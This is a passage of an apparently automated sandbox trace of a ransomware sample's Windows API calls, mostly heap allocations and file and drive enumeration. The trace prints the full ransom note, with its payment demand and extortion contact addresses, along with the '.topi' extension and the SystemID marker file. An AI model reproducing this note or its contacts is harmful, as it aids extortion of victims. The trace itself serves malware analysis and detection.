(HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e4fb8 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e5220 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e5488 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e56f0 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e5958 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e5bc0 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x816) returned 0x3171760 [0074.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df80, cbMultiByte=-1, lpWideCharStr=0x3171760, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x31e7528 [0074.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x31d4160 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e5e28 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e6090 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e62f8 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e6560 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e67c8 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e6a30 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e6c98 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e6f00 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e7168 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e7d68 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x3181668 [0074.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1d0) returned 0x316d100 [0074.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3181668 | out: hHeap=0x680000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2b7) returned 0x3171760 [0074.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d100 | out: hHeap=0x680000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x412) returned 0x3171a20 [0074.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x61a) returned 0x31ebd50 [0074.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171a20 | out: hHeap=0x680000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x3171760 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x105e) returned 0x31ec378 [0074.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3171760, cbMultiByte=-1, lpWideCharStr=0x31ec378, cchWideChar=2095 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned 1072 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1060) returned 0x31ed3e0 [0074.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ec378 | out: hHeap=0x680000) returned 1 [0074.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x31d4190 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e7fd0 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e8238 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e84a0 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e8708 [0074.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e8970 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e8bd8 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e8e40 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e90a8 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e9310 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e9578 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80a) returned 0x3171760 [0074.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df80, cbMultiByte=-1, lpWideCharStr=0x3171760, cchWideChar=1029 | out: lpWideCharStr=".topi") returned 6 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x31ec378 [0074.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bb808 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3840 [0074.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d28 | out: hHeap=0x680000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x3174d48 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x3183da0 [0074.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3840 | out: hHeap=0x680000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d978 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d9e0 [0074.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3183da0 | out: hHeap=0x680000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3220 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31254e0 [0074.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d9e0 | out: hHeap=0x680000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x3174980 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x3174878 [0074.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd8) returned 0x767098 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31254e0 | out: hHeap=0x680000) returned 1 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bb998 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31747c8 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x138) returned 0x3181668 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x767098 | out: hHeap=0x680000) returned 1 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d9e0 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d32b0 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x3174668 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x3174508 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c8) returned 0x31b2138 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3181668 | out: hHeap=0x680000) returned 1 [0074.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d32f8 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ff70 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bb808 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3174d48 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d978 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3220 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3174980 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3174878 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bb998 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31747c8 | out: hHeap=0x680000) returned 1 [0074.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d9e0 | out: hHeap=0x680000) returned 1 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d32b0 | out: hHeap=0x680000) returned 1 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3174668 | out: hHeap=0x680000) returned 1 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3174508 | out: hHeap=0x680000) returned 1 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d32f8 | out: hHeap=0x680000) returned 1 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b2138 | out: hHeap=0x680000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x31d41c0 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e97e0 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e9a48 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e9cb0 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e9f18 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31ea180 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31ea3e8 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31ea650 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31ea8b8 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31eab20 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31ead88 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x3181668 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1d0) returned 0x316d100 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3181668 | out: hHeap=0x680000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2b7) returned 0x31ecb90 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d100 | out: hHeap=0x680000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x412) returned 0x31ece50 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ecb90 | out: hHeap=0x680000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x61a) returned 0x3171760 [0074.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ece50 | out: hHeap=0x680000) returned 1 [0074.891] GetUserNameW (in: lpBuffer=0x18e180, pcbBuffer=0x18dff4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18dff4) returned 1 [0074.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x590) returned 0x31ecb90 [0074.892] GetLastError () returned 0x0 [0074.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6a5d28 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f3a0 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d28 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x3183da0 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f3a0 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d9e0 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3183da0 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31254e0 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d9e0 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd8) returned 0x767098 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31254e0 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x138) returned 0x3181668 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x767098 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bc0a0 [0074.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c8) returned 0x31b2138 [0074.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3181668 | out: hHeap=0x680000) returned 1 [0074.893] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bc078 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bb9e8 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bbfd8 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bb790 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2a0) returned 0x31ed128 [0074.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b2138 | out: hHeap=0x680000) returned 1 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bbe48 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f3a0 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3840 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bba10 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bbc18 [0074.894] GetLastError () returned 0x0 [0074.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bbba0 [0074.894] GetLastError () returned 0x0 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bb830 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3f0) returned 0x316ff28 [0074.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ed128 | out: hHeap=0x680000) returned 1 [0074.895] GetLastError () returned 0x0 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bbce0 [0074.895] GetLastError () returned 0x0 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31bb8f8 [0074.895] GetLastError () returned 0x0 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee460 [0074.895] GetLastError () returned 0x0 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c38b0 [0074.895] GetLastError () returned 0x0 [0074.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c38e8 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee488 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee4b0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5e8) returned 0x31d7708 [0074.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ff28 | out: hHeap=0x680000) returned 1 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee4d8 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee500 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee528 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee550 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee578 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee5a0 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3920 [0074.896] GetLastError () returned 0x0 [0074.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3958 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee5c8 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee5f0 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee618 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee640 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee668 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee690 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x316ff28 [0074.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d7708 | out: hHeap=0x680000) returned 1 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee6b8 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee6e0 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3990 [0074.897] GetLastError () returned 0x0 [0074.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c39c8 [0074.898] GetLastError () returned 0x0 [0074.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee708 [0074.898] GetLastError () returned 0x0 [0074.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee730 [0074.898] GetLastError () returned 0x0 [0074.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee758 [0074.898] GetLastError () returned 0x0 [0074.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee780 [0074.898] GetLastError () returned 0x0 [0074.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ee7a8 [0074.898] GetLastError () returned 0x0 [0074.908] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dce8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.908] GetLastError () returned 0x3 [0074.908] GetLastError () returned 0x3 [0074.908] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0074.909] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18dce8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x684 [0074.909] GetFileType (hFile=0x684) returned 0x1 [0074.910] GetLastError () returned 0x0 [0074.917] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.918] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0074.918] RegisterClassExW (param_1=0x18df60) returned 0xc170 [0074.918] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3027c [0074.919] NtdllDefWindowProc_W () returned 0x0 [0074.919] NtdllDefWindowProc_W () returned 0x1 [0074.921] NtdllDefWindowProc_W () returned 0x0 [0075.076] NtdllDefWindowProc_W () returned 0x0 [0075.077] ShowWindow (hWnd=0x3027c, nCmdShow=0) returned 0 [0075.077] UpdateWindow (hWnd=0x3027c) returned 1 [0075.077] GetLogicalDrives () returned 0x4 [0075.077] SetErrorMode (uMode=0x1) returned 0x0 [0075.077] PathFileExistsA (pszPath="C:\\") returned 1 [0075.077] SetErrorMode (uMode=0x0) returned 0x1 [0075.078] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x806) returned 0x3206d38 [0075.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df18, cbMultiByte=-1, lpWideCharStr=0x3206d38, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x3207da0 [0075.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3206d38 | out: hHeap=0x680000) returned 1 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6a5d28 [0075.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3207da0 | out: hHeap=0x680000) returned 1 [0075.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d28 | out: hHeap=0x680000) returned 1 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6a5d28 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x31bb128 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8ec) returned 0x31f0448 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x3206d38 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a1df0 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1060) returned 0x31f0d40 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d978 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x3207da0 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x660) returned 0x3170800 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a2678 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a2f00 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a3788 [0075.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a4010 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a4898 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x320d958 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a5120 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a59a8 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x31f1da8 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99b0cc8 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 